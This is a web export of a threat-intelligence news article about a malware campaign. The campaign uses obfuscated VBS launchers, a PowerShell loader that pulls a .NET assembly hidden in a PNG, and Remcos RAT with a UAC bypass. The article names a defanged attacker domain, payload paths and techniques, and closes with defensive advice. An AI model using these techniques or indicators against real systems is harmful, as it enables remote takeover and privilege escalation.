{"id":11622,"date":"2026-03-26T10:03:40","date_gmt":"2026-03-26T10:03:40","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/03\/26\/open-directory-malware-campaign-uses-obfuscated-vbs-png-loaders-and-rat-payloads\/"},"modified":"2026-03-26T10:03:40","modified_gmt":"2026-03-26T10:03:40","slug":"open-directory-malware-campaign-uses-obfuscated-vbs-png-loaders-and-rat-payloads","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/03\/26\/open-directory-malware-campaign-uses-obfuscated-vbs-png-loaders-and-rat-payloads\/","title":{"rendered":"Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads"},"content":{"rendered":"<p>    Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated multi-stage malware campaign has surfaced, deploying obfuscated Visual Basic Script (VBS) files, PNG-embedded loaders, and remote access trojans (RATs) to target systems without leaving a trace on disk. <\/p>\n<p>What began as a routine endpoint detection in early 2026 quickly revealed itself to be far more organized than a single opportunistic attack, exposing a reusable delivery framework capable of pushing different malware payloads across separate attack chains from one shared infrastructure.<a href=\"https:\/\/ppl-ai-file-upload.s3.us-east-1.amazonaws.com\/web\/direct-files\/attachments\/11146061\/9ef5cc5e-e926-4252-9f9f-8565b4d40fbd\/Open-Directory-Malware-Campaign-Uses-Obfuscated-VBS-PNG-Loaders-and-RAT-Payloads.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Checksum-Mode=ENABLED&amp;X-Amz-Credential=ASIA2F3EMEYEUYSTFZRS%2F20260325%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20260325T182833Z&amp;X-Amz-Expires=3600&amp;X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICCPK1wKo2ECfDzqdU1UN4yB7eYjrVAyCPg1NUvSGtgTAiB6Moe4tdYfH%2BWAHx8nbpHyqFRmHjgZKOJrQVWM9yIpECr0BAiz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDY5OTc1MzMwOTcwNSIMUfFHnFD2e%2Fm7D8tuKsgE%2FWSBMX4FlioQTWXHhjolclJFLm2cqp1fVFJ%2FPJnDmLIjod%2BCU7GWm3FFMsai3e%2BVx9TFisGmofhOWxxUQU%2BcJUflBMvZW%2BrRgR5MJP2DaoqNB9G5mgXpARn%2F1LXcJXPCssdZ%2FnQZkWhohHdWNDzKgiyP0vLlFW6Nk7CoLO6nkQbnJjhT79Yjz97HHgHoN1nr9AN4dpCp4VV9jj5Y%2BDR8C7xtlEJlLndy0PY41CW2j7hnmI8QsIXUFSkNcbY9jY8VlK9TGlH%2FnZictz5ffp7ldCpumZowRRzL5Dz6%2FOlu3bkn19B39jFW%2Fh50vrgZ6PhLt0XlJ0TA8SCOQ%2FmjPwDHg75Rw3K4C8ohcOC64RGfDIk8Z0RJI41BnS4my7wFkCruDZTAl9d%2FYfOf6QGoQv%2BSDZUl6w0M5KDH7kSOvoGxpQeyjfFZRjqHEB3LzfYWdU%2BYGIQsE67%2BPGv%2BVTF2y9n0TlPsc5jT%2FX2VIuS%2BQbLKpjOvwPFOO%2FTU%2FkJzWC4QhjLyBA5gFB3ut4frHJau%2FgOcBEBT22V09wkj5n9FJbCR3hMAU1rfj9mAYbrNrxzkAcr0kFOcPeXddT87A%2BUqjxSflhkdJA1Rh%2F0y3aRyB%2F88n05gNLz9NnH8Q9gw6%2BPEHU8omMrNCdrhhRrS2%2Be%2F20ZTRZmAK36tIvVmjSBY3VT5p0A7TWzkFN7Drvix26YH0XHgQy3NNi2hIyI1dvEMb6qlj84zPJ6ld30hz1ehCgcXXaFtBN9lkG5NBN2BWpAMDt8%2FbpvyLtoyLuYw6cSQzgY6mQHPS8puvENCR49kRGKoifstZ5NZ4XUZTf%2FYAkKIic6ycHF54A%2Fp0RL%2F%2FJL1Os3UGzyvlFJQ4svS8WJqe8m2Lf1p1TjvT8QIIu88Pl237RAsl0GN1k53ZoxwyGQrSZFRqxNvshdqyrH7Jcvx1zBKB%2B8ETR29PCJS%2Bg%2FEx2a%2BZGjpA9ufMI62svcuFEZOt%2BzmN4uRU4faWNtWxyo%3D&amp;X-Amz-SignedHeaders=host&amp;x-id=GetObject&amp;X-Amz-Signature=b93515107a1edcbb462e1defe6671a743b05cb42a411d31ed848fa8669435103\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p>The first sign of the campaign was a suspicious VBS file named\u00a0<code>Name_File.vbs<\/code>, found in the\u00a0<code>UsersPublicDownloads<\/code>\u00a0directory of a compromised endpoint. <\/p>\n<p>SentinelOne endpoint protection caught and quarantined the file before it could fully run. Even so, the encoded content inside the script warranted a closer look. <\/p>\n<p>When decoded, it exposed a Base64-encoded <a href=\"https:\/\/cybersecuritynews.com\/new-yurei-ransomware-with-powershell-commands\/\" id=\"126128\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell command<\/a> with embedded external network references \u2014 a clear signal that the file was designed to pull additional components from a remote server.<a href=\"https:\/\/ppl-ai-file-upload.s3.us-east-1.amazonaws.com\/web\/direct-files\/attachments\/11146061\/9ef5cc5e-e926-4252-9f9f-8565b4d40fbd\/Open-Directory-Malware-Campaign-Uses-Obfuscated-VBS-PNG-Loaders-and-RAT-Payloads.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Checksum-Mode=ENABLED&amp;X-Amz-Credential=ASIA2F3EMEYEUYSTFZRS%2F20260325%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20260325T182833Z&amp;X-Amz-Expires=3600&amp;X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICCPK1wKo2ECfDzqdU1UN4yB7eYjrVAyCPg1NUvSGtgTAiB6Moe4tdYfH%2BWAHx8nbpHyqFRmHjgZKOJrQVWM9yIpECr0BAiz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDY5OTc1MzMwOTcwNSIMUfFHnFD2e%2Fm7D8tuKsgE%2FWSBMX4FlioQTWXHhjolclJFLm2cqp1fVFJ%2FPJnDmLIjod%2BCU7GWm3FFMsai3e%2BVx9TFisGmofhOWxxUQU%2BcJUflBMvZW%2BrRgR5MJP2DaoqNB9G5mgXpARn%2F1LXcJXPCssdZ%2FnQZkWhohHdWNDzKgiyP0vLlFW6Nk7CoLO6nkQbnJjhT79Yjz97HHgHoN1nr9AN4dpCp4VV9jj5Y%2BDR8C7xtlEJlLndy0PY41CW2j7hnmI8QsIXUFSkNcbY9jY8VlK9TGlH%2FnZictz5ffp7ldCpumZowRRzL5Dz6%2FOlu3bkn19B39jFW%2Fh50vrgZ6PhLt0XlJ0TA8SCOQ%2FmjPwDHg75Rw3K4C8ohcOC64RGfDIk8Z0RJI41BnS4my7wFkCruDZTAl9d%2FYfOf6QGoQv%2BSDZUl6w0M5KDH7kSOvoGxpQeyjfFZRjqHEB3LzfYWdU%2BYGIQsE67%2BPGv%2BVTF2y9n0TlPsc5jT%2FX2VIuS%2BQbLKpjOvwPFOO%2FTU%2FkJzWC4QhjLyBA5gFB3ut4frHJau%2FgOcBEBT22V09wkj5n9FJbCR3hMAU1rfj9mAYbrNrxzkAcr0kFOcPeXddT87A%2BUqjxSflhkdJA1Rh%2F0y3aRyB%2F88n05gNLz9NnH8Q9gw6%2BPEHU8omMrNCdrhhRrS2%2Be%2F20ZTRZmAK36tIvVmjSBY3VT5p0A7TWzkFN7Drvix26YH0XHgQy3NNi2hIyI1dvEMb6qlj84zPJ6ld30hz1ehCgcXXaFtBN9lkG5NBN2BWpAMDt8%2FbpvyLtoyLuYw6cSQzgY6mQHPS8puvENCR49kRGKoifstZ5NZ4XUZTf%2FYAkKIic6ycHF54A%2Fp0RL%2F%2FJL1Os3UGzyvlFJQ4svS8WJqe8m2Lf1p1TjvT8QIIu88Pl237RAsl0GN1k53ZoxwyGQrSZFRqxNvshdqyrH7Jcvx1zBKB%2B8ETR29PCJS%2Bg%2FEx2a%2BZGjpA9ufMI62svcuFEZOt%2BzmN4uRU4faWNtWxyo%3D&amp;X-Amz-SignedHeaders=host&amp;x-id=GetObject&amp;X-Amz-Signature=b93515107a1edcbb462e1defe6671a743b05cb42a411d31ed848fa8669435103\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p><a href=\"https:\/\/www.levelblue.com\/blogs\/spiderlabs-blog\/tracing-a-multi-vector-malware-campaign-from-vbs-to-open-infrastructure\" id=\"https:\/\/www.levelblue.com\/blogs\/spiderlabs-blog\/tracing-a-multi-vector-malware-campaign-from-vbs-to-open-infrastructure\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LevelBlue analysts identified that this single endpoint alert<\/a> was a window into a much larger operation. <\/p>\n<p>The investigation, carried out by LevelBlue\u2019s SpiderLabs Cyber Threat Intelligence team, uncovered an attacker-controlled domain hosting multiple obfuscated VBS files, each linked to a different malware payload \u2014 including XWorm variants and Remcos RAT stored as text files. <\/p>\n<p>A separate infection chain tied to a fake PDF was also active on the same infrastructure, confirming the campaign\u2019s deliberate, multi-vector design.<a href=\"https:\/\/ppl-ai-file-upload.s3.us-east-1.amazonaws.com\/web\/direct-files\/attachments\/11146061\/9ef5cc5e-e926-4252-9f9f-8565b4d40fbd\/Open-Directory-Malware-Campaign-Uses-Obfuscated-VBS-PNG-Loaders-and-RAT-Payloads.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Checksum-Mode=ENABLED&amp;X-Amz-Credential=ASIA2F3EMEYEUYSTFZRS%2F20260325%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20260325T182833Z&amp;X-Amz-Expires=3600&amp;X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICCPK1wKo2ECfDzqdU1UN4yB7eYjrVAyCPg1NUvSGtgTAiB6Moe4tdYfH%2BWAHx8nbpHyqFRmHjgZKOJrQVWM9yIpECr0BAiz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDY5OTc1MzMwOTcwNSIMUfFHnFD2e%2Fm7D8tuKsgE%2FWSBMX4FlioQTWXHhjolclJFLm2cqp1fVFJ%2FPJnDmLIjod%2BCU7GWm3FFMsai3e%2BVx9TFisGmofhOWxxUQU%2BcJUflBMvZW%2BrRgR5MJP2DaoqNB9G5mgXpARn%2F1LXcJXPCssdZ%2FnQZkWhohHdWNDzKgiyP0vLlFW6Nk7CoLO6nkQbnJjhT79Yjz97HHgHoN1nr9AN4dpCp4VV9jj5Y%2BDR8C7xtlEJlLndy0PY41CW2j7hnmI8QsIXUFSkNcbY9jY8VlK9TGlH%2FnZictz5ffp7ldCpumZowRRzL5Dz6%2FOlu3bkn19B39jFW%2Fh50vrgZ6PhLt0XlJ0TA8SCOQ%2FmjPwDHg75Rw3K4C8ohcOC64RGfDIk8Z0RJI41BnS4my7wFkCruDZTAl9d%2FYfOf6QGoQv%2BSDZUl6w0M5KDH7kSOvoGxpQeyjfFZRjqHEB3LzfYWdU%2BYGIQsE67%2BPGv%2BVTF2y9n0TlPsc5jT%2FX2VIuS%2BQbLKpjOvwPFOO%2FTU%2FkJzWC4QhjLyBA5gFB3ut4frHJau%2FgOcBEBT22V09wkj5n9FJbCR3hMAU1rfj9mAYbrNrxzkAcr0kFOcPeXddT87A%2BUqjxSflhkdJA1Rh%2F0y3aRyB%2F88n05gNLz9NnH8Q9gw6%2BPEHU8omMrNCdrhhRrS2%2Be%2F20ZTRZmAK36tIvVmjSBY3VT5p0A7TWzkFN7Drvix26YH0XHgQy3NNi2hIyI1dvEMb6qlj84zPJ6ld30hz1ehCgcXXaFtBN9lkG5NBN2BWpAMDt8%2FbpvyLtoyLuYw6cSQzgY6mQHPS8puvENCR49kRGKoifstZ5NZ4XUZTf%2FYAkKIic6ycHF54A%2Fp0RL%2F%2FJL1Os3UGzyvlFJQ4svS8WJqe8m2Lf1p1TjvT8QIIu88Pl237RAsl0GN1k53ZoxwyGQrSZFRqxNvshdqyrH7Jcvx1zBKB%2B8ETR29PCJS%2Bg%2FEx2a%2BZGjpA9ufMI62svcuFEZOt%2BzmN4uRU4faWNtWxyo%3D&amp;X-Amz-SignedHeaders=host&amp;x-id=GetObject&amp;X-Amz-Signature=b93515107a1edcbb462e1defe6671a743b05cb42a411d31ed848fa8669435103\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p>The attacker\u2019s infrastructure centered on openly accessible directories within the domain\u00a0<code>news4me[.]xyz<\/code>, including\u00a0<code>\/coupon\/<\/code>,\u00a0<code>\/protector\/<\/code>, and\u00a0<code>\/invoice\/<\/code>. <\/p>\n<p>Each directory served a distinct role \u2014 staging VBS launchers, hosting obfuscated payload files, or delivering entirely separate infection vectors. <\/p>\n<p>This open-directory setup was not accidental; it let the attacker quickly update, rotate, or expand hosted payloads without modifying the core delivery logic, creating a flexible, scalable system capable of staying operational even after partial detection.<a href=\"https:\/\/ppl-ai-file-upload.s3.us-east-1.amazonaws.com\/web\/direct-files\/attachments\/11146061\/9ef5cc5e-e926-4252-9f9f-8565b4d40fbd\/Open-Directory-Malware-Campaign-Uses-Obfuscated-VBS-PNG-Loaders-and-RAT-Payloads.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Checksum-Mode=ENABLED&amp;X-Amz-Credential=ASIA2F3EMEYEUYSTFZRS%2F20260325%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20260325T182833Z&amp;X-Amz-Expires=3600&amp;X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICCPK1wKo2ECfDzqdU1UN4yB7eYjrVAyCPg1NUvSGtgTAiB6Moe4tdYfH%2BWAHx8nbpHyqFRmHjgZKOJrQVWM9yIpECr0BAiz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDY5OTc1MzMwOTcwNSIMUfFHnFD2e%2Fm7D8tuKsgE%2FWSBMX4FlioQTWXHhjolclJFLm2cqp1fVFJ%2FPJnDmLIjod%2BCU7GWm3FFMsai3e%2BVx9TFisGmofhOWxxUQU%2BcJUflBMvZW%2BrRgR5MJP2DaoqNB9G5mgXpARn%2F1LXcJXPCssdZ%2FnQZkWhohHdWNDzKgiyP0vLlFW6Nk7CoLO6nkQbnJjhT79Yjz97HHgHoN1nr9AN4dpCp4VV9jj5Y%2BDR8C7xtlEJlLndy0PY41CW2j7hnmI8QsIXUFSkNcbY9jY8VlK9TGlH%2FnZictz5ffp7ldCpumZowRRzL5Dz6%2FOlu3bkn19B39jFW%2Fh50vrgZ6PhLt0XlJ0TA8SCOQ%2FmjPwDHg75Rw3K4C8ohcOC64RGfDIk8Z0RJI41BnS4my7wFkCruDZTAl9d%2FYfOf6QGoQv%2BSDZUl6w0M5KDH7kSOvoGxpQeyjfFZRjqHEB3LzfYWdU%2BYGIQsE67%2BPGv%2BVTF2y9n0TlPsc5jT%2FX2VIuS%2BQbLKpjOvwPFOO%2FTU%2FkJzWC4QhjLyBA5gFB3ut4frHJau%2FgOcBEBT22V09wkj5n9FJbCR3hMAU1rfj9mAYbrNrxzkAcr0kFOcPeXddT87A%2BUqjxSflhkdJA1Rh%2F0y3aRyB%2F88n05gNLz9NnH8Q9gw6%2BPEHU8omMrNCdrhhRrS2%2Be%2F20ZTRZmAK36tIvVmjSBY3VT5p0A7TWzkFN7Drvix26YH0XHgQy3NNi2hIyI1dvEMb6qlj84zPJ6ld30hz1ehCgcXXaFtBN9lkG5NBN2BWpAMDt8%2FbpvyLtoyLuYw6cSQzgY6mQHPS8puvENCR49kRGKoifstZ5NZ4XUZTf%2FYAkKIic6ycHF54A%2Fp0RL%2F%2FJL1Os3UGzyvlFJQ4svS8WJqe8m2Lf1p1TjvT8QIIu88Pl237RAsl0GN1k53ZoxwyGQrSZFRqxNvshdqyrH7Jcvx1zBKB%2B8ETR29PCJS%2Bg%2FEx2a%2BZGjpA9ufMI62svcuFEZOt%2BzmN4uRU4faWNtWxyo%3D&amp;X-Amz-SignedHeaders=host&amp;x-id=GetObject&amp;X-Amz-Signature=b93515107a1edcbb462e1defe6671a743b05cb42a411d31ed848fa8669435103\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<h2 class=\"wp-block-heading\" id=\"inside-the-infection-mechanism-vbs-to-in-memory-ra\"><strong>Inside the Infection Mechanism: VBS to In-Memory RAT Execution<\/strong><\/h2>\n<p>The infection begins with a VBS file that acts purely as a launcher, carrying no active malicious code of its own. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhdrNREh90qexqQHDdg0u_XUd0AKWGia6QCTIiKOQ5ki_bRD5b5ZZKxC4V3mEhZR9aFWDOiwXWxu7m4SH66np7k_A6mt7A7tHZwLfndWl1TOCKryPJ6XQE4riGIzypHgIVgVkT8Xth5QinBNZhV4pIVUx3sim-FWOaIIjZopR6CbXWvTZ3_IjP_MA8mqS4\/s16000\/Name_File.vbs%2520content%2520%28Source%2520-%2520LevelBlue%29.webp?ssl=1\" alt=\"Name_File.vbs content (Source - LevelBlue)\"><figcaption class=\"wp-element-caption\">Name_File.vbs content (Source \u2013 LevelBlue)<\/figcaption><\/figure>\n<\/div>\n<p>The script is buried beneath layers of Unicode obfuscation. Stripping those characters exposes the raw encoded script in\u00a0a Base64-encoded PowerShell command that serves as the true engine of the attack.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhPEK8A3lyMEKF67_EOkYa4PQ4coZ4khyphenhyphenLyTWy8qfvKQ0jKJNfMxJ-OavDebbmHIiiUNox8kTOVEJeXqw_BYIpCDiKmeaZdKiwyy5on086q1gy9oqbOcvYyiWHEWNX4ylNA5N9lxBeB4Gc-wCV5hcdg9KhsC-V790oaoE9MOdFlhMEMvWG3dsuFgCAoy2A\/s16000\/Name_File.vbs%25C2%25A0Unicode%2520removal%2520%28Source%2520-%2520LevelBlue%29.webp?ssl=1\" alt=\"Name_File.vbs\u00a0Unicode removal (Source - LevelBlue)\"><figcaption class=\"wp-element-caption\">Name_File.vbs\u00a0Unicode removal (Source \u2013 LevelBlue)<\/figcaption><\/figure>\n<\/div>\n<p>That PowerShell command functions as a fileless loader. It enforces TLS 1.2 and uses the\u00a0<code>Net.WebClient<\/code>\u00a0class to fetch a remote file from an Internet Archive URL.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhWhX8e5a8pNhiaAIbnL98m7Fabb2jXpxycu5JNi1-dVG_LrGbT01_XBGR7RBWEiixdrpe3EFpV-NYEftP53LsyHtslnP2iey0Fj9gvcMsLwf4yS3LhvY65ss-GBuGC2y1M-PaG7avT6WcHigCgpOui3x7c5pSMYQjDHkFAdO4zWnxIwbt4u5tzpzbFg0E\/s16000\/Name_File.vbs%25C2%25A0decoded%2520PowerShell%2520command%2520%28Source%2520-%2520LevelBlue%29.webp?ssl=1\" alt=\"Name_File.vbs\u00a0decoded PowerShell command (Source - LevelBlue)\"><figcaption class=\"wp-element-caption\">Name_File.vbs\u00a0decoded PowerShell command (Source \u2013 LevelBlue)<\/figcaption><\/figure>\n<\/div>\n<p>Instead of pulling a traditional executable, it downloads a PNG image \u2014\u00a0<code>MSI_PRO_with_b64.png<\/code>. The file looks ordinary, but hidden inside it \u2014 between custom\u00a0<code>BaseStart<\/code>\u00a0and\u00a0<code>BaseEnd<\/code>\u00a0markers. <\/p>\n<p>This assembly, known as PhantomVAI, loads directly into memory via\u00a0<code>Reflection.Assembly::Load<\/code>, running entirely in RAM and bypassing most file-based security controls.<a href=\"https:\/\/ppl-ai-file-upload.s3.us-east-1.amazonaws.com\/web\/direct-files\/attachments\/11146061\/9ef5cc5e-e926-4252-9f9f-8565b4d40fbd\/Open-Directory-Malware-Campaign-Uses-Obfuscated-VBS-PNG-Loaders-and-RAT-Payloads.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Checksum-Mode=ENABLED&amp;X-Amz-Credential=ASIA2F3EMEYEUYSTFZRS%2F20260325%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20260325T182833Z&amp;X-Amz-Expires=3600&amp;X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICCPK1wKo2ECfDzqdU1UN4yB7eYjrVAyCPg1NUvSGtgTAiB6Moe4tdYfH%2BWAHx8nbpHyqFRmHjgZKOJrQVWM9yIpECr0BAiz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDY5OTc1MzMwOTcwNSIMUfFHnFD2e%2Fm7D8tuKsgE%2FWSBMX4FlioQTWXHhjolclJFLm2cqp1fVFJ%2FPJnDmLIjod%2BCU7GWm3FFMsai3e%2BVx9TFisGmofhOWxxUQU%2BcJUflBMvZW%2BrRgR5MJP2DaoqNB9G5mgXpARn%2F1LXcJXPCssdZ%2FnQZkWhohHdWNDzKgiyP0vLlFW6Nk7CoLO6nkQbnJjhT79Yjz97HHgHoN1nr9AN4dpCp4VV9jj5Y%2BDR8C7xtlEJlLndy0PY41CW2j7hnmI8QsIXUFSkNcbY9jY8VlK9TGlH%2FnZictz5ffp7ldCpumZowRRzL5Dz6%2FOlu3bkn19B39jFW%2Fh50vrgZ6PhLt0XlJ0TA8SCOQ%2FmjPwDHg75Rw3K4C8ohcOC64RGfDIk8Z0RJI41BnS4my7wFkCruDZTAl9d%2FYfOf6QGoQv%2BSDZUl6w0M5KDH7kSOvoGxpQeyjfFZRjqHEB3LzfYWdU%2BYGIQsE67%2BPGv%2BVTF2y9n0TlPsc5jT%2FX2VIuS%2BQbLKpjOvwPFOO%2FTU%2FkJzWC4QhjLyBA5gFB3ut4frHJau%2FgOcBEBT22V09wkj5n9FJbCR3hMAU1rfj9mAYbrNrxzkAcr0kFOcPeXddT87A%2BUqjxSflhkdJA1Rh%2F0y3aRyB%2F88n05gNLz9NnH8Q9gw6%2BPEHU8omMrNCdrhhRrS2%2Be%2F20ZTRZmAK36tIvVmjSBY3VT5p0A7TWzkFN7Drvix26YH0XHgQy3NNi2hIyI1dvEMb6qlj84zPJ6ld30hz1ehCgcXXaFtBN9lkG5NBN2BWpAMDt8%2FbpvyLtoyLuYw6cSQzgY6mQHPS8puvENCR49kRGKoifstZ5NZ4XUZTf%2FYAkKIic6ycHF54A%2Fp0RL%2F%2FJL1Os3UGzyvlFJQ4svS8WJqe8m2Lf1p1TjvT8QIIu88Pl237RAsl0GN1k53ZoxwyGQrSZFRqxNvshdqyrH7Jcvx1zBKB%2B8ETR29PCJS%2Bg%2FEx2a%2BZGjpA9ufMI62svcuFEZOt%2BzmN4uRU4faWNtWxyo%3D&amp;X-Amz-SignedHeaders=host&amp;x-id=GetObject&amp;X-Amz-Signature=b93515107a1edcbb462e1defe6671a743b05cb42a411d31ed848fa8669435103\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p>Once running, PhantomVAI passes two URLs into its VAI method for follow-on execution. The first,\u00a0<code>news4me[.]xyz\/protector\/johnremcos.txt<\/code>, contains an <a href=\"https:\/\/cybersecuritynews.com\/ai-based-obfuscated-malicious-apps-evading-av-detection\/\" id=\"133994\" target=\"_blank\" rel=\"noreferrer noopener\">obfuscated string<\/a> that decodes into a working instance of Remcos RAT, giving the attacker persistent remote access to the machine. <\/p>\n<p>The second URL delivers\u00a0<code>uac.png<\/code>, a PNG file carrying a UAC Bypass DLL in the same embedded format \u2014 designed to silently escalate privileges. Together, these payloads hand the attacker full control while leaving virtually no traditional file artifacts behind.<a href=\"https:\/\/ppl-ai-file-upload.s3.us-east-1.amazonaws.com\/web\/direct-files\/attachments\/11146061\/9ef5cc5e-e926-4252-9f9f-8565b4d40fbd\/Open-Directory-Malware-Campaign-Uses-Obfuscated-VBS-PNG-Loaders-and-RAT-Payloads.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;X-Amz-Checksum-Mode=ENABLED&amp;X-Amz-Credential=ASIA2F3EMEYEUYSTFZRS%2F20260325%2Fus-east-1%2Fs3%2Faws4_request&amp;X-Amz-Date=20260325T182833Z&amp;X-Amz-Expires=3600&amp;X-Amz-Security-Token=IQoJb3JpZ2luX2VjEOr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICCPK1wKo2ECfDzqdU1UN4yB7eYjrVAyCPg1NUvSGtgTAiB6Moe4tdYfH%2BWAHx8nbpHyqFRmHjgZKOJrQVWM9yIpECr0BAiz%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDY5OTc1MzMwOTcwNSIMUfFHnFD2e%2Fm7D8tuKsgE%2FWSBMX4FlioQTWXHhjolclJFLm2cqp1fVFJ%2FPJnDmLIjod%2BCU7GWm3FFMsai3e%2BVx9TFisGmofhOWxxUQU%2BcJUflBMvZW%2BrRgR5MJP2DaoqNB9G5mgXpARn%2F1LXcJXPCssdZ%2FnQZkWhohHdWNDzKgiyP0vLlFW6Nk7CoLO6nkQbnJjhT79Yjz97HHgHoN1nr9AN4dpCp4VV9jj5Y%2BDR8C7xtlEJlLndy0PY41CW2j7hnmI8QsIXUFSkNcbY9jY8VlK9TGlH%2FnZictz5ffp7ldCpumZowRRzL5Dz6%2FOlu3bkn19B39jFW%2Fh50vrgZ6PhLt0XlJ0TA8SCOQ%2FmjPwDHg75Rw3K4C8ohcOC64RGfDIk8Z0RJI41BnS4my7wFkCruDZTAl9d%2FYfOf6QGoQv%2BSDZUl6w0M5KDH7kSOvoGxpQeyjfFZRjqHEB3LzfYWdU%2BYGIQsE67%2BPGv%2BVTF2y9n0TlPsc5jT%2FX2VIuS%2BQbLKpjOvwPFOO%2FTU%2FkJzWC4QhjLyBA5gFB3ut4frHJau%2FgOcBEBT22V09wkj5n9FJbCR3hMAU1rfj9mAYbrNrxzkAcr0kFOcPeXddT87A%2BUqjxSflhkdJA1Rh%2F0y3aRyB%2F88n05gNLz9NnH8Q9gw6%2BPEHU8omMrNCdrhhRrS2%2Be%2F20ZTRZmAK36tIvVmjSBY3VT5p0A7TWzkFN7Drvix26YH0XHgQy3NNi2hIyI1dvEMb6qlj84zPJ6ld30hz1ehCgcXXaFtBN9lkG5NBN2BWpAMDt8%2FbpvyLtoyLuYw6cSQzgY6mQHPS8puvENCR49kRGKoifstZ5NZ4XUZTf%2FYAkKIic6ycHF54A%2Fp0RL%2F%2FJL1Os3UGzyvlFJQ4svS8WJqe8m2Lf1p1TjvT8QIIu88Pl237RAsl0GN1k53ZoxwyGQrSZFRqxNvshdqyrH7Jcvx1zBKB%2B8ETR29PCJS%2Bg%2FEx2a%2BZGjpA9ufMI62svcuFEZOt%2BzmN4uRU4faWNtWxyo%3D&amp;X-Amz-SignedHeaders=host&amp;x-id=GetObject&amp;X-Amz-Signature=b93515107a1edcbb462e1defe6671a743b05cb42a411d31ed848fa8669435103\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><\/p>\n<p>Organizations should restrict\u00a0<code>.vbs<\/code>\u00a0and\u00a0<code>.bat<\/code>\u00a0execution from user-writable directories such as\u00a0<code>UsersPublic<\/code>\u00a0and enforce constrained PowerShell policies with in-memory execution logging. <\/p>\n<p>At the network level, blocking WebDAV-based connections and filtering\u00a0<code>.xyz<\/code>\u00a0top-level domains can limit access to the attacker infrastructure identified in this campaign. <\/p>\n<p><a href=\"https:\/\/cybersecuritynews.com\/endpoint-protection-platform\/\" id=\"84841\" target=\"_blank\" rel=\"noreferrer noopener\">Endpoint protection<\/a> must be paired with deeper threat intelligence investigation \u2014 stopping one alert is not sufficient when the broader infrastructure remains active and ready to deploy from alternate vectors.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong>Follow us on\u00a0<a href=\"https:\/\/news.google.com\/publications\/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Google News<\/a>,\u00a0<a href=\"https:\/\/www.linkedin.com\/company\/cybersecurity-news\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LinkedIn<\/a>,\u00a0and\u00a0<a href=\"https:\/\/x.com\/cyber_press_org\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0<strong>Set CSN as a Preferred Source in\u00a0<a href=\"https:\/\/www.google.com\/preferences\/source?q=cybersecuritynews.com\" 